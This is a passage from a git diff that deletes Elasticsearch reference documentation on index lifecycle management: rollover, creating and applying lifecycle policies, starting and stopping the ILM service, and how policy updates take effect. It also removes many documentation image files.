index until some threshold is met and -then create a new index and start writing to it instead. -Using rolling indices enables you to: - -* Optimize the active index for high ingest rates on high-performance _hot_ nodes. -* Optimize for search performance on _warm_ nodes. -* Shift older, less frequently accessed data to less expensive _cold_ nodes, -* Delete data according to your retention policies by removing entire indices. - -We recommend using <> to manage time series -data. Data streams automatically track the write index while keeping configuration to a minimum. - -Each data stream requires an <> that contains: - -* A name or wildcard (`*`) pattern for the data stream. - -* The data stream's timestamp field. This field must be mapped as a - <> or <> field data type and must be - included in every document indexed to the data stream. - - * The mappings and settings applied to each backing index when it's created. - -Data streams are designed for append-only data, where the data stream name -can be used as the operations (read, write, rollover, shrink etc.) target. -If your use case requires data to be updated in place, you can instead manage your time series data using <>. However, there are a few more configuration steps and -concepts: - -* An _index template_ that specifies the settings for each new index in the series. -You optimize this configuration for ingestion, typically using as many shards as you have hot nodes. -* An _index alias_ that references the entire set of indices. -* A single index designated as the _write index_. -This is the active index that handles all write requests. -On each rollover, the new index becomes the write index. - -[discrete] -[role="xpack"] -[testenv="basic"] -[[ilm-automatic-rollover]] -=== Automatic rollover - -{ilm-init} enables you to automatically roll over to a new index based -on the index size, document count, or age. When a rollover is triggered, a new -index is created, the write alias is updated to point to the new index, and all -subsequent updates are written to the new index. - -TIP: Rolling over to a new index based on size, document count, or age is preferable -to time-based rollovers. Rolling over at an arbitrary time often results in -many small indices, which can have a negative impact on performance and -resource usage. diff --git a/docs/reference/ilm/index.asciidoc b/docs/reference/ilm/index.asciidoc deleted file mode 100644 index 550608916d8..00000000000 --- a/docs/reference/ilm/index.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[index-lifecycle-management]] -= {ilm-init}: Manage the index lifecycle - -[partintro] --- -You can configure {ilm} ({ilm-init}) policies to automatically manage indices -according to your performance, resiliency, and retention requirements. -For example, you could use {ilm-init} to: - -* Spin up a new index when an index reaches a certain size or number of documents -* Create a new index each day, week, or month and archive previous ones -* Delete stale indices to enforce data retention standards - -You can create and manage index lifecycle policies through {kib} Management or the {ilm-init} APIs. -When you enable {ilm} for {beats} or the {ls} {es} output plugin, -default policies are configured automatically. - -[role="screenshot"] -image:images/ilm/index-lifecycle-policies.png[] - -[TIP] -To automatically back up your indices and manage snapshots, -use <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- -include::ilm-overview.asciidoc[] - -include::ilm-concepts.asciidoc[] - -include::ilm-tutorial.asciidoc[] - -include::example-index-lifecycle-policy.asciidoc[leveloffset=-1] - -include::ilm-actions.asciidoc[] - -include::set-up-lifecycle-policy.asciidoc[] - -include::error-handling.asciidoc[] - -include::start-stop.asciidoc[] - -include::ilm-with-existing-indices.asciidoc[] - -include::ilm-skip-rollover.asciidoc[] - -include::ilm-and-snapshots.asciidoc[] diff --git a/docs/reference/ilm/set-up-lifecycle-policy.asciidoc b/docs/reference/ilm/set-up-lifecycle-policy.asciidoc deleted file mode 100644 index 667864c3c7e..00000000000 --- a/docs/reference/ilm/set-up-lifecycle-policy.asciidoc +++ /dev/null @@ -1,268 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[set-up-lifecycle-policy]] -== Configure a lifecycle policy [[ilm-policy-definition]] - -For {ilm-init} to manage an index, a valid policy -must be specified in the `index.lifecycle.name` index setting. - -To configure a lifecycle policy for <>, -you create the policy and add it to the <>. - -To use a policy to manage an index that doesn't roll over, -you can specify a lifecycle policy when you create the index, -or apply a policy directly to an existing index. - -{ilm-init} policies are stored in the global cluster state and can be included in snapshots -by setting `include_global_state` to `true` when you <>. -When the snapshot is restored, all of the policies in the global state are restored and -any local policies with the same names are overwritten. - -IMPORTANT: When you enable {ilm} for {beats} or the {ls} {es} output plugin, -the necessary policies and configuration changes are applied automatically. -You can modify the default policies, but you do not need to explicitly configure a policy or -bootstrap an initial index. - -[discrete] -[[ilm-create-policy]] -=== Create lifecycle policy - -To create lifecycle policies through {kib} Management -go to Management and click **Index Lifecycle Policies**. - -[role="screenshot"] -image:images/ilm/create-policy.png[] - -You specify the lifecycle phases for the policy and the actions to perform in each phase. - -The <> API is invoked to add the policy to the {es} cluster. - -.API example -[%collapsible] -==== -[source,console] ------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" <1> - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} <2> - } - } - } - } -} ------------------------- - -<1> Roll over the index when it reaches 25GB in size -<2> Delete the index 30 days after rollover -==== - -[discrete] -[[apply-policy-template]] -=== Apply lifecycle policy with an index template - -To use a policy that triggers the rollover action, -you need to configure the policy in the index template used to create each new index. -You specify the name of the policy and the alias used to reference the rolling indices. - -You can use the {kib} Create template wizard to create a template. To access the -wizard, open the menu and go to *Stack Management > Index Management*. In the -the *Index Templates* tab, click *Create template*. - -[role="screenshot"] -image:images/ilm/create-template-wizard-my_template.png[Create template page] - -The wizard invokes the <> to add templates to a cluster. - -.API example -[%collapsible] -==== -[source,console] ------------------------ -PUT _index_template/my_template -{ - "index_patterns": ["test-*"], <1> - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "my_policy", <2> - "index.lifecycle.rollover_alias": "test-alias" <3> - } - } -} ------------------------ - -<1> Use this template for all new indices whose names begin with `test-` -<2> Apply `my_policy` to new indices created with this template -<3> Define an index alias for referencing indices managed by `my_policy` -==== -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _index_template/my_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[discrete] -[[create-initial-index]] -==== Create an initial managed index - -When you set up policies for your own rolling indices, you need to manually create the first index -managed by a policy and designate it as the write index. - -IMPORTANT: When you enable {ilm} for {beats} or the {ls} {es} output plugin, -the necessary policies and configuration changes are applied automatically. -You can modify the default policies, but you do not need to explicitly configure a policy or -bootstrap an initial index. - -The name of the index must match the pattern defined in the index template and end with a number. -This number is incremented to generate the name of indices created by the rollover action. - -For example, the following request creates the `test-00001` index. -Because it matches the index pattern specified in `my_template`, -{es} automatically applies the settings from that template. - -[source,console] ------------------------ -PUT test-000001 -{ - "aliases": { - "test-alias":{ - "is_write_index": true <1> - } - } -} ------------------------ - -<1> Set this initial index to be the write index for this alias. - -Now you can start indexing data to the rollover alias specified in the lifecycle policy. -With the sample `my_policy` policy, the rollover action is triggered once the initial -index exceeds 25GB. -{ilm-init} then creates a new index that becomes the write index for the `test-alias`. - -[discrete] -[[apply-policy-manually]] -=== Apply lifecycle policy manually - -You can specify a policy when you create an index or -apply a policy to an existing index through {kib} Management or -the <>. -When you apply a policy, {ilm-init} immediately starts managing the index. - -IMPORTANT: Do not manually apply a policy that uses the rollover action. -Policies that use rollover must be applied by the <>. -Otherwise, the policy is not carried forward when the rollover action creates a new index. - -The `index.lifecycle.name` setting specifies an index's policy. - -.API example -[%collapsible] -==== -[source,console] ------------------------ -PUT test-index -{ - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "my_policy" <1> - } -} ------------------------ -<1> Sets the lifecycle policy for the index. -==== - -[discrete] -[[apply-policy-multiple]] -==== Apply a policy to multiple indices - -You can apply the same policy to multiple indices by using wildcards in the index name -when you call the <> API. - -WARNING: Be careful that you don't inadvertently match indices that you don't want to modify. - -////////////////////////// -[source,console] ------------------------ -PUT _index_template/mylogs_template -{ - "index_patterns": [ - "mylogs-*" - ], - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1 - }, - "mappings": { - "properties": { - "message": { - "type": "text" - }, - "@timestamp": { - "type": "date" - } - } - } - } -} ------------------------ - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.24/_doc -{ - "@timestamp": "2019-06-24T10:34:00", - "message": "this is one log message" -} ------------------------ -// TEST[continued] - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.25/_doc -{ - "@timestamp": "2019-06-25T17:42:00", - "message": "this is another log message" -} ------------------------ -// TEST[continued] - -[source,console] --------------------------------------------------- -DELETE _index_template/mylogs_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] ------------------------ -PUT mylogs-pre-ilm*/_settings <1> -{ - "index": { - "lifecycle": { - "name": "mylogs_policy_existing" - } - } -} ------------------------ -// TEST[continued] - -<1> Updates all indices with names that start with `mylogs-pre-ilm` diff --git a/docs/reference/ilm/start-stop.asciidoc b/docs/reference/ilm/start-stop.asciidoc deleted file mode 100644 index 3e630c7f527..00000000000 --- a/docs/reference/ilm/start-stop.asciidoc +++ /dev/null @@ -1,140 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[start-stop-ilm]] -== Start and stop {ilm} - -By default, the {ilm-init} service is in the `RUNNING` state and manages -all indices that have lifecycle policies. - -You can stop {ilm} to suspend management operations for all indices. -For example, you might stop {ilm} when performing scheduled maintenance or making -changes to the cluster that could impact the execution of {ilm-init} actions. - -IMPORTANT: When you stop {ilm-init}, <> -operations are also suspended. -No snapshots will be taken as scheduled until you restart {ilm-init}. -In-progress snapshots are not affected. - -[discrete] -[[get-ilm-status]] -=== Get {ilm-init} status - -To see the current status of the {ilm-init} service, use the <>: - -//// -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "min_age": "10d", - "actions": { - "forcemerge": { - "max_num_segments": 1 - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT my-index-000001 -{ - "settings": { - "index.lifecycle.name": "my_policy" - } -} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET _ilm/status --------------------------------------------------- - -Under normal operation, the response shows {ilm-init} is `RUNNING`: - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "RUNNING" -} --------------------------------------------------- - - - -[discrete] -[[stop-ilm]] -=== Stop {ilm-init} - -To stop the {ilm-init} service and pause execution of all lifecycle policies, -use the <>: - -[source,console] --------------------------------------------------- -POST _ilm/stop --------------------------------------------------- -// TEST[continued] - -{ilm-init} service runs all policies to a point where it is safe to stop. -While the {ilm-init} service is shutting down, -the status API shows {ilm-init} is in the `STOPPING` mode: - -//// -[source,console] --------------------------------------------------- -GET _ilm/status --------------------------------------------------- -// TEST[continued] -//// - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "STOPPING" -} --------------------------------------------------- -// TESTRESPONSE[s/"STOPPING"/$body.operation_mode/] - -Once all policies are at a safe stopping point, {ilm-init} moves into the `STOPPED` mode: - -//// -[source,console] --------------------------------------------------- -PUT trigger_ilm_cs_action - -GET _ilm/status --------------------------------------------------- -// TEST[continued] -//// - -[source,console-result] --------------------------------------------------- -{ - "operation_mode": "STOPPED" -} --------------------------------------------------- -// TESTRESPONSE[s/"STOPPED"/$body.operation_mode/] - -[discrete] -=== Start {ilm-init} - -To restart {ilm-init} and resume executing policies, use the <>. -This puts the {ilm-init} service in the `RUNNING` state and -{ilm-init} begins executing policies from where it left off. - -[source,console] --------------------------------------------------- -POST _ilm/start --------------------------------------------------- -// TEST[continued] - - diff --git a/docs/reference/ilm/update-lifecycle-policy.asciidoc b/docs/reference/ilm/update-lifecycle-policy.asciidoc deleted file mode 100644 index 75f3a6a7cb9..00000000000 --- a/docs/reference/ilm/update-lifecycle-policy.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[update-lifecycle-policy]] -=== Lifecycle policy updates -++++ -Policy updates -++++ - -You can change how the lifecycle of an index or collection of rolling indices is managed -by modifying the current policy or switching to a different policy. - -To ensure that policy updates don't put an index into a state where it can't exit the current phase, -the phase definition is cached in the index metadata when it enters the phase. -This cached definition is used to complete the phase. - -When the index advances to the next phase, it uses the phase definition from the updated policy. - -[discrete] -[[ilm-apply-changes]] -=== How changes are applied - -When a policy is initially applied to an index, the index gets the latest version of the policy. -If you update the policy, the policy version is bumped and {ilm-init} can detect that the index -is using an earlier version that needs to be updated. - -Changes to `min_age` are not propagated to the cached definition. -Changing a phase's `min_age` does not affect indices that are currently executing that phase. - -For example, if you create a policy that has a hot phase that does not specify a `min_age`, -indices immediately enter the hot phase when the policy is applied. -If you then update the policy to specify a `min_age` of 1 day for the hot phase, -that has no effect on indices that are already in the hot phase. -Indices created _after_ the policy update won't enter the hot phase until they are a day old. - -[discrete] -[[ilm-apply-new-policy]] -=== How new policies are applied - -When you apply a different policy to a managed index, -the index completes the current phase using the cached definition from the previous policy. -The index starts using the new policy when it moves to the next phase. diff --git a/docs/reference/images/Exponential.png b/docs/reference/images/Exponential.png deleted file mode 100644 index 1591f747a13..00000000000 Binary files a/docs/reference/images/Exponential.png and /dev/null differ diff --git a/docs/reference/images/Gaussian.png b/docs/reference/images/Gaussian.png deleted file mode 100644 index 9d49bfb9470..00000000000 Binary files a/docs/reference/images/Gaussian.png and /dev/null differ diff --git a/docs/reference/images/Linear.png b/docs/reference/images/Linear.png deleted file mode 100644 index d06862266c1..00000000000 Binary files a/docs/reference/images/Linear.png and /dev/null differ diff --git a/docs/reference/images/analysis/token-graph-basic.svg b/docs/reference/images/analysis/token-graph-basic.svg deleted file mode 100644 index 99c2b0cb24f..00000000000 --- a/docs/reference/images/analysis/token-graph-basic.svg +++ /dev/null @@ -1,45 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-dns-ex.svg b/docs/reference/images/analysis/token-graph-dns-ex.svg deleted file mode 100644 index 0eda4fa54bd..00000000000 --- a/docs/reference/images/analysis/token-graph-dns-ex.svg +++ /dev/null @@ -1,65 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-dns-invalid-ex.svg b/docs/reference/images/analysis/token-graph-dns-invalid-ex.svg deleted file mode 100644 index 5614f39bfe3..00000000000 --- a/docs/reference/images/analysis/token-graph-dns-invalid-ex.svg +++ /dev/null @@ -1,72 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-dns-synonym-ex.svg b/docs/reference/images/analysis/token-graph-dns-synonym-ex.svg deleted file mode 100644 index cff5b1306b7..00000000000 --- a/docs/reference/images/analysis/token-graph-dns-synonym-ex.svg +++ /dev/null @@ -1,72 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-qbf-ex.svg b/docs/reference/images/analysis/token-graph-qbf-ex.svg deleted file mode 100644 index 63970673092..00000000000 --- a/docs/reference/images/analysis/token-graph-qbf-ex.svg +++ /dev/null @@ -1,45 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-qbf-synonym-ex.svg b/docs/reference/images/analysis/token-graph-qbf-synonym-ex.svg deleted file mode 100644 index 2baa3d9e63c..00000000000 --- a/docs/reference/images/analysis/token-graph-qbf-synonym-ex.svg +++ /dev/null @@ -1,52 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-wd.svg b/docs/reference/images/analysis/token-graph-wd.svg deleted file mode 100644 index cdbbfb8a084..00000000000 --- a/docs/reference/images/analysis/token-graph-wd.svg +++ /dev/null @@ -1,52 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/analysis/token-graph-wdg.svg b/docs/reference/images/analysis/token-graph-wdg.svg deleted file mode 100644 index 992637bd668..00000000000 --- a/docs/reference/images/analysis/token-graph-wdg.svg +++ /dev/null @@ -1,53 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/cardinality_error.png b/docs/reference/images/cardinality_error.png deleted file mode 100644 index cf405be69ab..00000000000 Binary files a/docs/reference/images/cardinality_error.png and /dev/null differ diff --git a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-results.svg b/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-results.svg deleted file mode 100644 index 3c48418b9c4..00000000000 --- a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-results.svg +++ /dev/null @@ -1,83 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-search.svg b/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-search.svg deleted file mode 100644 index dbf852edd46..00000000000 --- a/docs/reference/images/ccs/ccs-dont-min-roundtrip-shard-search.svg +++ /dev/null @@ -1,83 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.png b/docs/reference/images/ccs/ccs-min-roundtrip-client-request.png deleted file mode 100644 index bf023da054b..00000000000 Binary files a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.png and /dev/null differ diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.svg b/docs/reference/images/ccs/ccs-min-roundtrip-client-request.svg deleted file mode 100644 index 7224a25c24a..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-client-request.svg +++ /dev/null @@ -1,81 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-client-response.svg b/docs/reference/images/ccs/ccs-min-roundtrip-client-response.svg deleted file mode 100644 index e806b2c4731..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-client-response.svg +++ /dev/null @@ -1,79 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-results.svg b/docs/reference/images/ccs/ccs-min-roundtrip-cluster-results.svg deleted file mode 100644 index 9ffb651b9da..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-results.svg +++ /dev/null @@ -1,77 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-search.svg b/docs/reference/images/ccs/ccs-min-roundtrip-cluster-search.svg deleted file mode 100644 index eb481182953..00000000000 --- a/docs/reference/images/ccs/ccs-min-roundtrip-cluster-search.svg +++ /dev/null @@ -1,77 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/data-streams/create-index-template.png b/docs/reference/images/data-streams/create-index-template.png deleted file mode 100644 index 7506409897e..00000000000 Binary files a/docs/reference/images/data-streams/create-index-template.png and /dev/null differ diff --git a/docs/reference/images/data-streams/data-streams-diagram.svg b/docs/reference/images/data-streams/data-streams-diagram.svg deleted file mode 100644 index 361345a43a7..00000000000 --- a/docs/reference/images/data-streams/data-streams-diagram.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/data-streams/data-streams-index-request.svg b/docs/reference/images/data-streams/data-streams-index-request.svg deleted file mode 100644 index 08daf499d8e..00000000000 --- a/docs/reference/images/data-streams/data-streams-index-request.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/data-streams/data-streams-list.png b/docs/reference/images/data-streams/data-streams-list.png deleted file mode 100644 index 38ec3727e49..00000000000 Binary files a/docs/reference/images/data-streams/data-streams-list.png and /dev/null differ diff --git a/docs/reference/images/data-streams/data-streams-search-request.svg b/docs/reference/images/data-streams/data-streams-search-request.svg deleted file mode 100644 index e827b783f06..00000000000 --- a/docs/reference/images/data-streams/data-streams-search-request.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/decay_2d.png b/docs/reference/images/decay_2d.png deleted file mode 100644 index df03db4965a..00000000000 Binary files a/docs/reference/images/decay_2d.png and /dev/null differ diff --git a/docs/reference/images/eql/separate-state-machines.svg b/docs/reference/images/eql/separate-state-machines.svg deleted file mode 100644 index 635d2139c3b..00000000000 --- a/docs/reference/images/eql/separate-state-machines.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/eql/sequence-state-machine.svg b/docs/reference/images/eql/sequence-state-machine.svg deleted file mode 100644 index 78229666dae..00000000000 --- a/docs/reference/images/eql/sequence-state-machine.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/docs/reference/images/ilm/create-policy.png b/docs/reference/images/ilm/create-policy.png deleted file mode 100644 index f6d86fa9b4e..00000000000 Binary files a/docs/reference/images/ilm/create-policy.png and /dev/null differ diff --git a/docs/reference/images/ilm/create-template-wizard-my_template.png b/docs/reference/images/ilm/create-template-wizard-my_template.png deleted file mode 100644 index fd712e2a6e4..00000000000 Binary files a/docs/reference/images/ilm/create-template-wizard-my_template.png and /dev/null differ diff --git a/docs/reference/images/ilm/create-template-wizard.png b/docs/reference/images/ilm/create-template-wizard.png deleted file mode 100644 index d16f785e927..00000000000 Binary files a/docs/reference/images/ilm/create-template-wizard.png and /dev/null differ diff --git a/docs/reference/images/ilm/index-lifecycle-policies.png b/docs/reference/images/ilm/index-lifecycle-policies.png deleted file mode 100644 index 184188be181..00000000000 Binary files a/docs/reference/images/ilm/index-lifecycle-policies.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-custom-policy.png b/docs/reference/images/ilm/tutorial-ilm-custom-policy.png deleted file mode 100644 index 03b67829f60..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-custom-policy.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-delete-phase-creation.png b/docs/reference/images/ilm/tutorial-ilm-delete-phase-creation.png deleted file mode 100644 index 91a55733c28..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-delete-phase-creation.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-delete-rollover.png b/docs/reference/images/ilm/tutorial-ilm-delete-rollover.png deleted file mode 100644 index ba021ecc2ac..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-delete-rollover.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-hotphaserollover-default.png b/docs/reference/images/ilm/tutorial-ilm-hotphaserollover-default.png deleted file mode 100644 index a9088c63d88..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-hotphaserollover-default.png and /dev/null differ diff --git a/docs/reference/images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png b/docs/reference/images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png deleted file mode 100644 index c6f1e9b40e9..00000000000 Binary files a/docs/reference/images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management-index-templates-mappings.png b/docs/reference/images/index-mgmt/management-index-templates-mappings.png deleted file mode 100644 index beb964b3481..00000000000 Binary files a/docs/reference/images/index-mgmt/management-index-templates-mappings.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management-index-templates.png b/docs/reference/images/index-mgmt/management-index-templates.png deleted file mode 100644 index 07f1fb9a7ad..00000000000 Binary files a/docs/reference/images/index-mgmt/management-index-templates.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_component_template.png b/docs/reference/images/index-mgmt/management_index_component_template.png deleted file mode 100644 index c03029fd172..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_component_template.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_create_wizard.png b/docs/reference/images/index-mgmt/management_index_create_wizard.png deleted file mode 100644 index bff1dd4cd0e..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_create_wizard.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_data_stream_backing_index.png b/docs/reference/images/index-mgmt/management_index_data_stream_backing_index.png deleted file mode 100644 index a5c577affbb..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_data_stream_backing_index.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_data_stream_stats.png b/docs/reference/images/index-mgmt/management_index_data_stream_stats.png deleted file mode 100644 index a67ab4a7deb..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_data_stream_stats.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_details.png b/docs/reference/images/index-mgmt/management_index_details.png deleted file mode 100644 index b199d13218f..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_details.png and /dev/null differ diff --git a/docs/reference/images/index-mgmt/management_index_labels.png b/docs/reference/images/index-mgmt/management_index_labels.png deleted file mode 100644 index a89c32e08be..00000000000 Binary files a/docs/reference/images/index-mgmt/management_index_labels.png and /dev/null differ diff --git a/docs/reference/images/ingest/enrich/enrich-policy-index.svg b/docs/reference/images/ingest/enrich/enrich-policy-index.svg deleted file mode 100644 index 8ec6ae59a68..00000000000 --- a/docs/reference/images/ingest/enrich/enrich-policy-index.svg +++ /dev/null @@ -1,40 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ingest/enrich/enrich-process.svg b/docs/reference/images/ingest/enrich/enrich-process.svg deleted file mode 100644 index a346f759238..00000000000 --- a/docs/reference/images/ingest/enrich/enrich-process.svg +++ /dev/null @@ -1,64 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ingest/enrich/enrich-processor.svg b/docs/reference/images/ingest/enrich/enrich-processor.svg deleted file mode 100644 index 95978c6026b..00000000000 --- a/docs/reference/images/ingest/enrich/enrich-processor.svg +++ /dev/null @@ -1,50 +0,0 @@ - - - - Slice 1 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/ingest/ingest-process.svg b/docs/reference/images/ingest/ingest-process.svg deleted file mode 100644 index 66557798531..00000000000 --- a/docs/reference/images/ingest/ingest-process.svg +++ /dev/null @@ -1,42 +0,0 @@ - - - - Enrich process 2 - Created with Sketch. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/docs/reference/images/lambda.png b/docs/reference/images/lambda.png deleted file mode 100644 index 324967326f9..00000000000 Binary files a/docs/reference/images/lambda.png and /dev/null differ diff --git a/docs/reference/images/lambda_calc.png b/docs/reference/images/lambda_calc.png deleted file mode 100644 index 4fd19a2660f..00000000000 Binary files a/docs/reference/images/lambda_calc.png and /dev/null differ diff --git a/docs/reference/images/lucene-in-memory-buffer.png b/docs/reference/images/lucene-in-memory-buffer.png deleted file mode 100644 index 37674886183..00000000000 Binary files a/docs/reference/images/lucene-in-memory-buffer.png and /dev/null differ diff --git a/docs/reference/images/lucene-written-not-committed.png b/docs/reference/images/lucene-written-not-committed.png deleted file mode 100644 index 9d295fb412f..00000000000 Binary files a/docs/reference/images/lucene-written-not-committed.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/elasticsearch_exe.png b/docs/reference/images/msi_installer/elasticsearch_exe.png deleted file mode 100644 index fd84e5397bf..00000000000 Binary files a/docs/reference/images/msi_installer/elasticsearch_exe.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_configuration.png b/docs/reference/images/msi_installer/msi_installer_configuration.png deleted file mode 100644 index 36bae6cc519..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_configuration.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_help.png b/docs/reference/images/msi_installer/msi_installer_help.png deleted file mode 100644 index 458b0821c1f..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_help.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_installed_service.png b/docs/reference/images/msi_installer/msi_installer_installed_service.png deleted file mode 100644 index 34585377a91..00000000000 Binary files a/docs/reference/images/msi_installer/msi_installer_installed_service.png and /dev/null differ diff --git a/docs/reference/images/msi_installer/msi_installer_installing.png b/docs/reference/images/msi_installer/msi_installer_installing.png deleted file mode 100644 index 